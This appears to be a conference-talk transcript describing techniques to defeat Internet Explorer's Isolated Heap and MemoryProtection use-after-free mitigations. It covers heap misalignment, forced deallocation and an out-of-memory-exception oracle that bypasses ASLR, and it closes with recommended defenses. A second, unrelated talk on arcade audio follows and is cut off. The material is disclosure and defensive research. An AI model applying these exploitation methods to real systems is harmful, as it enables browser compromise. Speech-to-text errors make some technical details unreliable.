here. That attacker can also override that object with another object of a different size so it doesn't have to be a specific of the same exact size so it can be smaller or bigger. So the attacks on isolated heap are very specific, like bug specific. Basically it's highly dependent on the offset being referenced at crash time. So most of the attacks that I'm going to be discussing in my next slides will be related to the type confusion issues and other misalignment issues. So the first attack I'll be discussing is the aligned allocation attack technique. Basically it's not just like you have a free isolated object, you free it and you allocate another isolated object at the same exact spot. But the only challenge here is that what type of object that you would actually allocate instead of that object. This scenario or this attack works well when you have a bug that or you just have to feel that actually the reference is a high offset. So basically you can always choose or find another object that you can control certain offsets like high offsets, certain values or have partial control of. To have this attack working properly we need to put a low fragmentation heap. The reason for that is that we're probably going to be allocating objects of different sizes so we don't want to end up having these allocations on different buckets so we want to have it on the same exact bucket. So the simplest way to achieve this is like in nutshell we have to trigger some freeing conditions like we have to free that specific object. Then in case we want to allocate like a bigger object we have to trigger like massage the heap in order to free multiple chunks, multiple free chunks. Later on we have to call us all the free chunks together in one big chunk. Then we have to space certain objects or replace that specific object with whatever object we want. We can do it with a bigger object, we can do it with a smaller object, it doesn't matter. It depends whatever scenario we have. And finally it's going to be like reusing or trigger their use. So this is my fancy graph here. It shows we have a C table row object and up front we have a C DOM text node. These are isolated basically in this specific example. The C table row, the fee happens on that specific object and then what we did is we overrode it with a C DOM text node. So the reason why we chose a C DOM text node is that in that specific case the bug was referencing I guess offset 30 and the C DOM text node contains an interesting value at offset 30 that we can partially control. So this is the Wendie bug dump, it's a before and after. Basically it shows the C table row before being freed and overwritten. And later on we overrode it with a C DOM text node. Highlighted in yellow is the offset that we're targeting. So basically C DOM text node contains a that specific offset 40000, which can be sprayed. So basically we partially control that offset. So this is a crash time. So when we have a successful overwrite and then we do reference everything, we're going to have a crash time, it's the referencing 40000 as you guys can see. So from there an attacker can spray that address and then control the flow of execution. So the second attack technique that I'll be discussing is the misaligned allocations attack technique. The aligned attack technique works well for high offsets, but in case we have a user after feed that references a low offset that can be kind of problematic. Because we don't have a lot of choices when it comes to DOM objects that we can overwrite it with and have specific low offsets that we can control or partially control. So basically the idea is if we have an object that's allocated at let's say address X, then we have to probably start allocations at X minus n. And then we're going to have one of the objects at X minus n being misaligned against the original object and then we're going to trigger a use and we're going to have an offset being referenced from the misaligned object. So the simple steps are basically influence the heap to call us a lot of free chunks together and then have them like in one big free chunk. Later on we have to spray random objects inside that big free chunk, but in a way that we're going to have one of the objects misaligned against the original object. And later on we're going to trigger the reuse and have it reference something from the misaligned object. So again this is my fancy graph here. Basically we have a C table row. At the front we have a C button, button object. Both are isolated. Then this bug targets the C table row object. Basically what we did is we freed a whole bunch of objects, coalesced all the free chunks together in one big chunk and then we started spraying random objects and then at a specific spot we had the C button misaligned against the original C button row. Basically then dereferencing an offset from the C button row. So basically if you bug dereferencing let's say offset X from C table row you're going to have it dereferencing something different. It's not the same offset from C button. So basically in a nutshell we need to stabilize the heap in a way to produce the same exact free chunk of the same size every time and then we're going to have to spray it with random objects. Basically in my specific example we were able to stabilize the heap with this specific code. It's not a generic code to always produce a free chunk of the same size, but it was like bug specific. It worked every time. In that specific example we had EDI pointing to the middle of the free chunk and later on we're going to see how it works. The free chunk is of size 110. It was always producing the same 110 free chunk. So as you guys can see this is a crash time. EBX comes from EDI. EDI points to the middle of a big free chunk of size 110. Later on we're going to see when we get control. So assuming that we were able to stabilize the heap in a way to give us the same free chunk of the same size every time then we would need to actually spray it with a bunch of objects. In this specific example I chose to target to have a misaligned C button object because at a certain offset it contains a value that I can spray. We can do it in a bunch of ways. We don't have to do it with a C button. Someone can argue that they can do it with a text area and then set some coordinates and you're going to have it working. But the idea here is just to have a misaligned object against the original object. This one worked well though. So this is a crash time. Actually we had EDI plus one C pointing to one two C zero zero four zero zero. It lands on that specific value which is an offset of the misaligned C button object. And as you guys can guess this value can be sprayed easily and then we can gain control. So in a nutshell just to wrap it up. Isolated heap does a good job isolating certain objects from other allocations. It's not perfect. Still have a lot of type confusion issues. It still have misalignment issues. Attacking isolated heap depends on several factors. It's more bug specific. We have to avoid low fragmentation heap as much as possible. And it depends on the offsets that being dereferenced. So I'm going to give it back to Brian to discuss memory protection. All right. So memory protection was introduced in July of 2014 and months after that. I think the patch the month after that they made some improvements to memory protection. What we noticed in the zero day initiative is we were analyzing cases and when that July patch came out we started to see that the cases that we hadn't purchased yet were turning into null pointer dereferences which was really interesting to us. And so we dig more into that and we found memory protection messing with the use after freeze that we were looking at. So we have to figure out what exactly is memory protection. Memory protection is a delayed frame mechanism inside of Internet Explorer and its purpose is to prevent blocks from being deallocated when they're referenced either on the stack or in processor registers. It keeps these blocks in a zeroed out state so that they're unusable and it adds it to a wait list. And every so often a reclamation process will occur. It will go through that wait list of objects and free them at the heap manager level. And so the way that they actually implemented this is instead of calling heap free on these objects they would call protected free on these objects instead. So we kind of need to understand how the heap, how the protected free function works. So the first thing that it does when protected free is called is it checks the wait list and checks to see if it's full. If the wait list is full it will go ahead and process the reclamation sweep, cleaning up the objects that are no longer referenced. After that it will add that block to the wait list and it will zero out and return to the user. If the wait list is not full, which is the case almost all of the time, it will check the aggregate size of the blocks on the wait list. If that aggregate size is over 100,000 bytes it will then perform a reclamation sweep, add the block to the wait list, zero it out and return to the caller. If for example the threshold has not been met it will add the block to the wait list without performing the reclamation sweep. It will zero out the block and return to the caller. So when we look at this the most important thing that we need to know about this function is we can ignore the first check as an attacker because we have control of what protected free actually the allocations that are going on. What we're going to focus on is the 100,000 byte threshold. What we're going to, the most important thing to know is that the reclamation sweep always occurs before the block is, a new block is added to the wait list and that's what we're going to leverage later on when we're trying to free at the heat manager level certain use after free conditions. What exactly is the reclamation process? Well there's that wait list which contains an entry for every block that has been requested to be deallocated and in that entry you've got the block base address, you have the block size and you have a flag that determines whether it's on the isolated heap or the process heap. It will iterate through those entries on the wait list and check the, check to see if there are any references to that object on the stack. It will check to see if there's any references to that object in the processor registers and if there is then the block is wait listed or continues to be wait listed. So after the reclamation sweep the block will still be there, still be zeroed out, still be allocated and can't be used by the attacker. If the references don't exist then we have the object will be freed at the heap manager level and released back. So in the cases where in a use after free where there is a reference on the stack or in the processor registers the memory protection is highly effective. It will keep those blocks allocated so that you can't allocate something underneath them and reuse them in a malicious way. So the, but there's that subset of use after freeze that aren't referenced anymore but there's still, memory protection is still changing the way that the application actually operates and so it causes them some challenges. So what are the challenges that memory protection presents an attacker for the subset of use after freeze that are no longer being referenced? Well first there's the deallocation delay and this is because there's that reclamation sweep that we're waiting for to perform before it would actually get deallocated. So there's several non-determinism that exists because of memory protection. First is the non-determinism produced by what we're calling stack junk which could be non-pointers or stale pointers that are left over in stack buffers that are not clear to their former use. It may just so happen that those stale pointers or values that are on the stack could point into an object that you want to be deallocated but because that stack junk exists the memory protection will not free that object. There's also complexity determining deallocation time due to the number of objects on the wait list so your timing could be off along with complex heap manager behavior due to reordering of the wait list which will result in unstable stack conditions which you kind of need for certain UAF situations. So what can we do? Well the first elementary attack technique is just the generic memory pressuring loop that's been used and used after freeze for a long time to force garbage collection where we'd allocate over 100,000 bytes worth of objects and then we would free them, force reclamation and clear it out. Well that definitely defeats the deallocation delay challenge but it doesn't stop the non-determinism challenge that exists due to memory protection. When we submitted this paper back in October of 2014 there was an unconditional reclamation step when WND PROC was entered to service a message on the threads main when WND PROC is actually entered. The this unconditional reclamation step post September 2014 was rendered non-functional by Microsoft and so this attack technique no longer works which was basically to delay execution of the exploit until that event happened and that unconditional reclamation supercured. Now used after freeze are sometimes timing based and so you need to, this doesn't always work but because Microsoft basically rendered it non-functional it really doesn't matter but for record it's there. So what do we want to do? We want to be able to remove the non-determination, we want to be able to delay deallocation and so what are we going to rely on? Well we're going to rely on the fact that memory protection first checks the size of the wait list and before it performs a reclamation sweep and only afterwards does it add that current block to the wait list. So when you call protected free on block at address A, A will definitely not be reclaimed on that call but it will definitely be on the wait list when the call is complete. So we're going to leverage that fact to make sure we can organize our calls in a way that will guarantee that we deallocate block, a block that we want to use and use after free. We're also going to rely on the fact that the isolated, that the, it doesn't matter which heap the object is on, it can be on the isolated heap or the processed heap. So step one, we want to be able to prep the wait list and we're going to do this by finding a method to trigger arbitrarily sized buffer allocations. So when we find that method, we'll allocate a buffer of 100,000 bytes. We will then free that buffer which because the wait, because the wait list, because of protected free and the way that it operates, it will add that block to the wait list and at this point we know the next time we call protected free, it will then free the blocks that are ready to be reclaimed. So you can kind of see that's the state of the wait list. At the point we have a set of blocks X on the wait list that are waiting to be freed. If they're not referenced anymore, then there's a block of 100,000 bytes that guarantees we hit the reclamation step on the next call of protected free. So we're going to trigger another block and the purpose of this, these steps is to get the wait list into a known state and an approximate size. So we're going to trigger the allocation of a block of size F. We're going to free that block which protected free will be called on that object and reclamation step will be performed because we've reached that threshold of 100,000 bytes. It will go through and iterate through that wait list freeing any block that's no longer referenced by the application on the stack or the process registers and it will also free block A which will bring the wait list into a consistent state and a good size. After all the freeing is done, it will add block B which will bring that wait list to a consistent size and at this point we have a good idea of what the wait list actually looks like. So next we're going to set up the freeing of block C which is the object that we want to perform our use after free attack on and our purpose now with these steps is to cleanly deallocate block C with the minimal amount of additional heap operations. So we call it, we free object C which calls protected free. We no longer are over the threshold so it adds the block to the wait list. Then we allocate that 100,000 byte block. We free that block but because we're not at the wait list, we're not at the threshold yet, it will add it to the wait list. We will then allocate another block which will put us over the wait list and trigger the reclamation step on the next call to protected free and at this point when we call free on object E, we will be freeing object C and object D and reliably. We know then exactly when we're able to deallocate block object C. We can then use the isolated heap techniques that Abdul talked about to perform our use after free attack against object C. You can see what the wait list looks at that point. But we need that method for arbitrarily allocating objects and arbitrarily freeing objects. We can't really rely on sysalloc string or sysfree string based string buffers because they don't use protected free and that's what we need. So in this case, Cster comes to our aid in MSHTML and we can use the DOM method, get elements by class name and in that method, it will create a Cster using the string value passed in and then later it will deallocate using protected free that string. And that's what we're going to use for the arbitrary allocation and deallocation of objects and manipulating the wait list and memory protection. To do this, you actually have to do a priming procedure against the DOM object and we'll talk about it in a second. And really the only limitations to this is the fact that there is a limitation on the size of the object. The smallest buffer you can use in Cster is 56 hex but there is no upper limit so we can be guaranteed that we're going to hit that threshold of 100,000 bytes in that check inside of protected free. So what does the code look like? Well, this is it. Pretty simple. First, we're going to create an object, a DOM object. We're going to call, the priming procedure is basically calling get elements by class name with the string that you're going to use later and keeping a reference to the returned value then any other subsequent call to get elements by class name using that string will reliably allocate a Cster at a size and deallocate that same object using protected free. And as a result, we can now take the steps that we laid out previously to reliably deallocate an object that is not completely mitigated by memory protection. We'll show you a video of one of the proof of concepts that we provided Microsoft of one of the cases that we had submitted, one of our researcher cases that we took to controlling a register. Basically it's using that get elements by class name technique to reliably deallocate that object and then using the isolated heap techniques, the aligned allocations that Abdul talked about to get control of the register, the EIP register. So now I'm going to hand it over to Simon and he will go over bypassing ASLR and also all the recommended defenses. Okay, in this section we're going to talk about how we were able to abuse memory protection to get a bypass of ASLR. So after I got comfortable with these techniques of making precision modifications to the memory protection state, I went back and I started thinking some more about something I'd read in a blog post by Fortinet back in July of 2014. And to progress from that blog post, back in 2013, Dion showed how conservative garbage collectors used by script engines can be attacked to leak information about heap addresses. So does memory protection provide a new surface for a similar attack? That's an interesting idea. In a sense, memory protection acts like a conservative garbage collector freeing allocated memory only if no references are found on the stack. This means that it might be susceptible to an attack similar to the garbage collection attack done by Dion. The key idea here is that when memory protection examines values on the stack, it doesn't understand anything about the semantics of those values. It treats each D word as if it is potentially a pointer. So if we'd like, we can plant a chosen value on the stack and memory protection will interpret it as a pointer. Memory protection will then exhibit different behavior depending on whether or not the integer that we chose corresponds to an address of white listed memory. Here we see a block of memory that is white listed. So let's say we plant an integer value on the stack and then trigger the memory protection reclamation routine. If the integer that we planted corresponds to an address anywhere within the block, then memory protection will respond in one way and by keeping the block on the wait list. But if the integer we planted is not within the wait listed block, then memory protection will behave in a different way and it will deallocate the block. So it's starting to sound like we may have a way to reveal information about the layout of the address space. We can repeatedly guess an address, plant it as an integer on the stack, and get memory protection to behave in a way that reveals whether or not we have correctly guessed the address of a certain targeted block in memory. In other words, we have an oracle. Or do we? Because at this point, there's still a very big problem. Let's take a look at the programmatic contract that's exposed by memory protection. Aside from that DLL notification, which is not something that gets called during normal program operation, memory protection does not ever return even a single piece of data from any of its methods. That's a problem. We can influence memory protection based on whether we've guessed the correct address or not, but to have an oracle, we need to have the ability to read some kind of response back. And memory protection's API gives us absolutely nothing. What this means is we need a side channel. So when I was thinking about this, the first thing that came to mind was that maybe we could use a timing attack. Then something else came along. It was in the summer of 2014, and some cases started coming into ZDI that were kind of unusual. We were seeing proof of concept code that would expose bad code paths in the Internet Explorer by subjecting the browser to memory pressure. The code would do some lengthy loop doing repeated DOM manipulations and also consuming memory. And at some point when address space was nearly exhausted and memory allocations were starting to fail, a code path would be triggered that was vulnerable. It was striking how a reasonably reliable trigger could be constructed in this way, even though the browser process was under such a high level of stress. I started to think about the idea of operating the browser in a regime of high memory pressure. It's relatively unexplored territory. What kinds of things can we make happen? It struck me as interesting. Something else I noticed was that when script requests an operation that requires a heap allocation and the allocation fails due to lack of available memory, the script receives an out of memory exception. Here we have a way for attackers script to detect whether an allocation was a success or a failure. All it needs to do is check for the exception. Here's the crucial insight. Script can detect whether an allocation succeeds or fails. Whether it succeeds or fails is a function of the existing state of the heap. In other words, JavaScript out of memory exceptions are a side channel that reveals information about the state of the heap. That's exactly the side channel we need in order to get information back from memory protection. Here's the high level view of how we consult the memory protection oracle. Don't be concerned about the exact details. I'm going to get to that just a bit later. For now, let's appreciate the high level structure of what we're going to do. Say we have a block of memory on the memory protection wait list. We want to consult the oracle to determine whether a certain address, X, is an address that falls within the block. We plant X on the stack as an integer and then we do something that triggers the reclamation routine. In response, memory protection modifies the heap in a way that's dependent on whether X points within the targeted block. How do we find out how memory protection has responded? We attempt a heap allocation that is designed to either succeed or fail depending on what memory protection has done to the heap. Then by checking for the presence or absence of an out of memory exception, we can make a deduction about how memory protection has behaved and then this reveals the answer to whether X falls within the targeted block of memory. Here's the whole chain of deductions we make. Presence or absence of an out of memory exception tells us something about the state of the heap. The state of the heap tells us something about how memory protection behaved and how memory protection behaved tells us whether X falls within the targeted block. That's the high level view. Clearly to actualize all this, it's going to take some pretty careful setup. Here's the thing. Going back to something I mentioned earlier, once you start thinking about what you can do in a regime of high memory pressure, some really interesting possibilities open up. Before going any further though, I'd like to refine what we mean by high memory pressure. It's more subtle than just piling on lots of pressure until there's almost no memory left. First of all, it's not really available memory we're talking about. It's availability of address space. In a 32-bit process, the limiting factor that's going to cause allocation failures is not memory exhaustion, it's address space exhaustion. The next thing to note, it's possible for allocations to fail even if there's plenty of address space left. It all just depends on how large of an allocation you're asking for. Also, it's not the aggregate amount of remaining address space that matters. It's whether a large enough contiguous free region can be found. Let's refine our idea as follows. Operating the browser in a regime of limited availability of large contiguous regions of free address space. Let's play with this a little bit. Suppose we spray the heap with one megabyte allocations until all address space is consumed. Then we free one of those one megabyte blocks. What's left is a one megabyte hole. That hole is going to be the one and only contiguous region of one megabytes of free addresses. Actually, you can leave lots of smaller holes also. But it doesn't change the fact that we have exactly one hole that's one megabyte big. Now we go back and we make one more one megabyte allocation. We know it will be placed right in that hole because that's the only place it can fit. We can actually keep doing this over and over, allocating a one megabyte block and freeing it, allocating a one megabyte block and freeing it. Every single time it's going to be allocated in exactly the same place. What happened if one time we tried to make that allocation but it failed? What would that tell us? What could make that happen? One thing that could make that happen is if some other allocation went up and came around and occupied that hole. But let's say we can rule that out because we know there are no other big allocations going on. What would that tell us? We might be able to conclude that what happened was that the last time that we freed the one megabyte allocation, it never really got freed because memory protection was holding on to it. We have a way of telling whether the hole is free or occupied by trying to make a new one megabyte allocation and checking to see if an out of memory exception is thrown. Now we have all the main pieces in place to make an attack possible. First we prepare memory so there's just one large contiguous free region, let's say one megabyte in size, but it could be any size we like. We're going to call that the hole or the region. What we're going to try to do is use memory protection as an oracle to determine where that hole is in memory. So we're going to guess an address X and we want to consult the oracle to determine if X falls within the hole. What we're going to do is first we'll make a one megabyte allocation so now the hole is occupied. Next we're going to free that allocation, meaning that it gets passed to protected free and protected free puts the allocation on the wait list. As far as the windows heat manager is concerned the memory is still allocated. Then we're going to plant X as an integer on the stack and while X is there on the stack we're going to do something that triggers memory reclamation. Now what happens next depends on whether X falls within this one megabyte address region or not. If X falls within the address region then when memory protection performs reclamation it will keep this allocation on the wait list and it won't free it on the heat manager level. Otherwise if X doesn't fall within the region then memory protection will remove this allocation from the wait list and invoke heat free which completely deallocates that block. So this shows the two possible states that we can end up in. If X falls within the region then the hole stays occupied but if X does not fall within the region then the hole gets opened up again. Last step to tell which of these two states we just ended up in all we need to do is make one more one megabyte allocation. If it succeeds we know that the hole got opened and this means that X wasn't within the region but if we get an out of memory extension then we know that the hole stayed occupied which tells us that X falls within the region. Now we have an answer from the oracle and then by repeating this process with different values of X we can use the oracle to find out exactly where this one megabyte hole is in memory. Now I'm going to go back to this idea just one more time when we operate the browser in a regime of limited availability of contiguous regions of free address space the new possibilities that arise can be quite interesting and actually is going to lead us to what we can do next. So far what we have is a way to prepare the address space so there's just one large hole of available addresses of a size of our choosing and then to use the memory protection oracle to determine the exact addresses of that hole. How can we make good use of this ability? What can an attacker gain from knowing the address of a hole in the address space? We can load a module into it. We can start by creating a hole that's exactly the right size for loading a particular module then using the memory protection oracle we leak the address of the hole finally we cause the loading of the module. It gets loaded exactly at the beginning of the hole because that's the only place where it's going to fit. So it's actually an SLR bypass and it runs really efficiently and reliably we're going to show a demo video here what it looks like to run. This is a fully patched IE. On that demo video it's got the address already popping up. And there it is. Okay, so this has been a lot of fun. It started out looking like something that was non-exploitable turned out in the end to be a reliable SLR bypass. The key insight that made it possible is that JavaScript out of memory exceptions are a side channel that reveals critical information about the state of the heap. I don't think it's been recognized before. There are really interesting possibilities that open up when you operate the browser under memory pressure. Okay, so we've made several recommendations to Microsoft for ways that it can improve isolated heap and memory protection to harden them against the attacks we've discovered. In regard to memory protection we've seen how in various situations the attacker can benefit from the ability to make precision modifications to the state of memory protection. And we've even shown that this leads to a breakdown of ASLR. To make memory protection resistant to attempt to normalize and to control its state we make the recommendation to remove memory protection from array and buffer allocations. This means that memory protection would apply only to scalar allocations. Our rationale is that one almost never finds an exploitable use after free condition in Internet Explorer where the freed object is an array or a buffer. On very rare occasion we have seen UAF cases submitted to a zero-day initiative where the freed object is some sort of string data. But in every case these have turned out to be non-exploitable conditions. And since UAFs of arrays and buffers in Internet Explorer are rare to non-existent, the benefit of applying memory protection to these allocations is doubtful. On the other hand we've demonstrated how it can be a very significant benefit to an attacker with air-fulfill that memory protection will be a stronger defense if applied to scalar allocations only. Our next suggestion pertains to strengthening ASLR. Taking a look at how we got ASLR to fail, what you can notice is that the attacker was able to violate one of ASLR's assumptions by preparing the address space in a particular way. Do you know Diozovi made a similar observation when he said, thinking about security mitigations like DEP and ASLR designed for service-ide code doesn't work when you give your attacker an interpreter. So I feel that ASLR needs to be strengthened for the browser because the browser is an inherently more hostile environment. Here's the particular assumption that ASLR makes that when it chooses a load address for a module from among the set of possible load addresses that this random choice will exhibit a significant amount of entropy. But an attacker can break this assumption by radically narrowing the set of possible load addresses before the module loads. Our recommendation is to enhance ASLR by adding an additional check before loading a module. This check is to ensure that there really do exist a multiplicity of addresses at which the requested module could load before actually performing the random selection of a load address. If the number of possible load addresses is below a certain threshold, the module load should fail. Since loading the module under this circumstance could significantly weaken the security of the entire process. Ideally this mitigation would be implemented at the kernel level and it could be made available on an opt-in basis for executables such as browsers which are a more hostile environment as we mentioned. It would also be possible to implement this mitigation in user-land code at the application level by hooking the relevant system calls. Here's a quick-site sequence diagram showing how the entropy check works. The application requests the module to be loaded. Kernel examines how many places of memory available for the module to load. Kernel decides that the minimum threshold is met and it proceeds to choose one of the possible load addresses at random, loads the module, and it returns success to the caller. While the kernel is responding to the module load request, it locks changes to the address space to prevent a time of check, time of use attack. Another time the application requests the module to be loaded. Kernel examines how many places of memory available for the module to load. This time the kernel detects that there are too few possible load addresses. The kernel denies the module load request, returns failure to the application, and it shows the locking that takes place during the second request. Next recommendation is regard to out-of-memory exceptions. We've shown that JavaScript out-of-memory exceptions are a side channel that reveals information about the state of the heap. Although this leaked bit of information might seem insignificant at first, we have a very good idea of how it can be leveraged to great effect. It should also be mentioned that out-of-memory exceptions greatly aid the attacker in setting up conditions of memory pressure that are needed for our ASLR bypass attack, as well as triggering other vulnerabilities that are dependent on memory pressure. We therefore recommend considering eliminating out-of-memory exceptions in script. When an allocation fails due to memory or address space exhaustion, instead of passing an exception up to script code where it can be handled, the condition should be considered as fatal to the process, or at least fatal to script execution within the process. This seems unlikely to have a significant negative impact upon legitimate web pages and web applications. Finally, we recommend taking ISO heap to the next logical step by creating additional separate heaps. Ideally one could have a separate heap for each scalar type. This would bring two great benefits. First, a use-after-free condition could never lead to type confusion, since every type is confined to its own heap. Secondly, since each heap consists entirely of objects of homogenous size, misalignments will not arise. Actually, this last point is made trickier by storage of C++ arrays, because C++ arrays can introduce misalignment, because when an array is stored, the individual elements don't have heap metadata added to them, the way that heap metadata is added to the individual scalar allocations, and plus the C++ compiler adds some metadata of its own to store the arrays' dimensions. It's actually possible to use C++ arrays to introduce misalignment into heaps. However, as we've mentioned, exploitable UAFs in arrays and buffers are extremely rare in Internet Explorer, so we recommend just leaving all array and buffer allocations on the default heap instead. If we do that, it should become impossible for an attacker to produce misalignments on the isolated heaps. Actually, there's another completely separate reason why it's best to leave arrays and buffers on the main process heap. I'd like to digress a moment to explain why. There's something that doesn't get much attention when iso-heap is discussed, and that's what we could be called an address-reuse attack. What's that? Well, consider how iso-heap is supposed to ensure that when a DOM object is freed, then an attacker won't be able to allocate some other non-dom type object in its place, such as a string. Iso-heap tries to ensure this by making sure that DOM allocations and string allocations don't happen on the same heap. But here's the thing. The attacker doesn't care about heaps. The attacker only cares about addresses. Is it possible for the address of a freed DOM object to later on be the address of a string allocation? Well, this would become possible if, say, the iso-heap, which is the heap on which DOM objects are stored, sometimes relinquishes control of virtual address space that it no longer needs. That would create the opportunity for those same addresses to later become part of a different heap, such as a process heap. And a string could be allocated there. Is this attack actually possible? Currently, this attack is not possible. Here's why. The way the Windows heap manager works with small allocations is that it puts them inside regions of virtual memory called heap segments. And once a particular heap reserves a segment, it never relinquishes control of those virtual addresses. For as long as that heap lives, it's never going to allow those addresses to become part of any other heap. And today, the iso-heap is used only for small-scalar allocations, so it's good. But if instead, i.e., tried to protect large buffer allocations by placing them on the iso-heap, then isolation wouldn't be guaranteed. For large allocations, the heap manager doesn't use heap segments. When the heap manager freed the buffer, it would relinquish control over the virtual addresses involved, and later on, those virtual addresses could become part of a different heap, breaking the isolation. So what this means for us is that it's pointless using Windows heap manager to try to protect buffers and arrays by placing them on an isolated heap. That isolation could be easily broken using an address reuse attack. The bottom line is, best way is to keep array and buffer allocations on the default heap and have a separate isolated heap for every type of scalar allocation. Then those isolated heaps will be completely immune to type confusion and misalignment issues. So having a separate heap for every scalar type is highly beneficial, but the drawback is that it may be too wasteful of address space in a 32-bit process where address space is a scarce resource. We're faced with a trade-off between security and address space usage. What can we do to make the best of this trade-off? We're only going to be able to create a limited number of heaps. How can we make things as hard as possible for an attacker using only a limited number of heaps? In whatever way we make assignments of types to heaps, an attacker who has discovered a UAF on one particular heap will try to construct an exploit via type confusion and or misalignment by making use of the various types that we have assigned to that same heap. Unless we randomize the assignments between heaps and types, we can break the monoculture of heap partitioning and instead random partitioning at process startup time. Denies to the attacker the ability to write a reliable exploit that relies on knowledge of which types are co-located on a heap. It optimizes the defender's advantage when we make the trade-off between security and the number of heaps we're willing to create. Here's how randomized heap partitioning can function. At process startup time, the process creates a certain configured number of heaps. This number should be chosen based on the trade-off between security and address space usage. Then, it allocates an array having one element corresponding to each scalar type in the application. The initialization code then populates each element of the array with a heap handle chosen at random from among the available heaps. Then, whenever application code performs a heap allocation of a particular scalar type, just looks up the appropriate heap handle in the array and uses that heap and the same applies to the allocation. We expect that randomized heap partitioning will make exploits a lot messier because the types that are needed for type confusion and or misalignment are never guaranteed to be on the heap that the attacker needs them to be on. Exploit reliability will suffer as a result. Failed exploit attempts typically result in process crashes, making attacks easier to detect. This means that ODays in the wild can be discovered and patched more quickly. Also the attacker gains no knowledge from crashes since a new randomization is done with every process startup. In some randomized heap partitioning, CIM serves to minimize the benefit that the attacker can hope to attain relative to the cost of discovering UAFs and developing and fielding exploits for them. To recap the new defenses we are recommending, remove memory protection from arrays and buffers. Strengthen ASLR by making a positive check for entropy in load address selection. After eliminating JavaScript out of memory exceptions, create one heap type in 64-bit processes. Use randomized heap partitioning in 32-bit processes. All right. So just kind of a little bit of conclusion. Of course we have many use after freeze coming into our program. We have attacks against isolated heap. We have attacks against memory protection and an ASLR break. So why not put it all together into an exploit? So we did that for the bounty submission. So not that most of us have not seen a IEA exploit before, but at the time it was the latest patched IEA. And what you're going to see it do is it's going to run and break ASLR. It will say retry once and then it will get the load address and then exploit the use after free vulnerability and pop calc. So we can chain this with one of the many sandbox escapes that we know about in IEA to do some damage. So we are releasing all of the research that we did for the Microsoft bounty program. It's actually up on GitHub right now. I just checked. We've released the white paper that we submitted to Microsoft. We have proof of concepts up there for the memory protection and isolated heap stuff. We have put ASLR bypasses up that targets Windows 7, IEA 11 in default configuration. We've also uploaded a ASLR bypass that works against Windows 8.1, IEA 11 in default configuration up there because they decided not to fix it even though we provided quite a bit of recommended defenses. So in conclusion, this research was a lot of fun. We got to kind of come at it from another side. We're usually the ones deciding how much to pay for vulnerabilities and exploits. And in this case, we put our research up to another company to judge it. And so it was an interesting experience. We learned a lot going through it. I really had a good experience with Microsoft dealing with them. So this is where we sit today. Are there any questions? Yes? Hello. Do you have any technique for avoiding LFH after users in some indeterminate state of browsing? This can be a little bit tricky. I don't think there's a generic way to do it, but it's solely bug-specific. Hey, some of those slides read patent pending. Are these mitigations encumbered by patents? Some of them are patent pending. For Microsoft, specifically with the way that the bounty program works, the release's rights to them to use them all. Thanks. My memory protection technique does not apply to 64-bit processes. Any other? All right. Thank you for your time. Enjoy playing with the proof of concepts. Thank you.
|
In the summer of 2014, Microsoft silently introduced two new exploit mitigations into Internet Explorer with the goal of disrupting the threat landscape. These mitigations increase the complexity of successfully exploiting a use-after-free vulnerability. June's patch (MS14-035) introduced a separate heap, called Isolated Heap, which handles most of the DOM and supporting objects. July's patch (MS14-037) introduced a new strategy called MemoryProtection for freeing memory on the heap. This talk covers the evolution of the Isolated Heap and MemoryProtection mitigations, examines how they operate, and studies their weaknesses. It outlines techniques and steps an attacker must take to attack these mitigations to gain code execution on use-after-free vulnerabilities where possible. It describes how an attacker can use MemoryProtection as an oracle to determine the address at which a module will be loaded to bypass ASLR. Finally, additional recommended defenses are laid out to further harden Internet Explorer from these new attack vectors.
|
10.5446/32805 (DOI)
|
Alright, so thanks everyone for making it back after lunch. So my talk is on reversing midway arcade audio. So let's just get right into this because I got a lot of slides. So about me, IT Monkey, consultant by day, hardware hacker by night, interest in designing and reversing embedded systems, IC security failure analysis, arcade platforms which is what this talk is and automotive stuff. And you can contact me, XSIDE 31337 at yahoo.com. So what is DCS? DCS stands for digital compression system. So it's a sound system developed by Williams Electronics, used in Williams pinballs, casino slot machines and midway coin-up arcade games. So the architecture provides six channels of 16-bit audio, independent and with independent control over the volume looping and playback of each of those channels. So the distinction is it's not... I'd call it six voices or six channel polyphony because it actually gets down-mixed to mono or stereo or whatever the hardware supports on the particular implementation. And so it can play back anything from short sound effects to voiceovers to several minute long music tracks, which before that was unheard of, it would all have to be tracked or composed MIDI style FM synthesis music. So the first pinball game to use it was Indiana Jones in 93 and the first arcade game to use it was Morclomet 2 also in 93. So there's a few variants that Williams made over the years. There's the first DCS-1, so it's ROM-based mono, uses the ADSP 2105 with a single DAC. Then there's a DCS-95 which was used for some of the pinballs. There's DCS-2 ROM-based stereo, so it's got a beefier DSP running to two DACs, left and right channel. DCS-2 ROM-based stereo, so RAM-based meaning... This one and the one underneath it, the RAM-based multi-channel. Basically they moved to architecture because a lot of the games started using... were shipping on hard drives instead of e-proms. So the multi-channel variant can run up to six DACs for surround sound type deployment. And interesting, I think IDES supports the ADSP 2181, the bottom one. So I haven't played around with it though. So basically a quick history of arcade audio. There's been several techniques over the years, but so there's analog, which was literally discrete components, amplifiers, RC networks, whatever, to generate the sound that way, oscillators, things like that. Then there was digital sound generator chips, so just simple Nintendo style, square triangle, whatever wave sawtooth audio that way. I'm not sure, we'll see if I can get a clip. Is it playing or not? Is it possible to get the audio coming out the main speakers? Oh, there we go. So this was... So you can hear it's basically blips and bleeps and Nintendo style. Then next came the FM synthesis era. Whoa. Wait back. Which was... So an example of this was Jocklin 1986. This used the AMAHA FM synthesis, so... So pretty basic. Then it moved to sample based systems like OutRun, which still used the AMAHA FM synthesis, but used the PCM sample I see. So, get a sound. Then that was followed a few years later by just a fancier sample I see, and for example Turtles in Time in 91. So, I like that one because the composition is good, even if the instruments sound terrible in it compared to a lot of the games out there. So then, kind of related, here's Mortal Kombat 1, which did not use DCS, same thing, it used the AMAHA with a sampling chip. So let's... So you can hear it's kind of tinny, gross FM synthesis characteristic sound. After that came Super Street Fighter 2 Turbo, for example, again using Yamaha but with the Q sound DSP. And then, just for reference, Street Fighter III Third Strike in 99 used a 16 channel, so 16 voice, but 8 bit sample I see, so we'll do a demo of this. So you can hear the voice is kind of... the sound... the voice clips are kind of scratchy because it's 8 bit sampling or whatever. And then finally, kind of back related to this talk is Mortal Kombat 2 came out in 93. And it used the... it was the first game using DCS, using the analog devices, ADSP 2100 family, no Yamaha, like no FM synthesis, just everything on the DSP. So we'll do a demo of this. Oop, where is it? So already, we'll do one more for good measure. So the thing to notice... When you're listening to the music, the drums, it's not some wavetable or like, you know, Auth 32 where it's pulling a drum 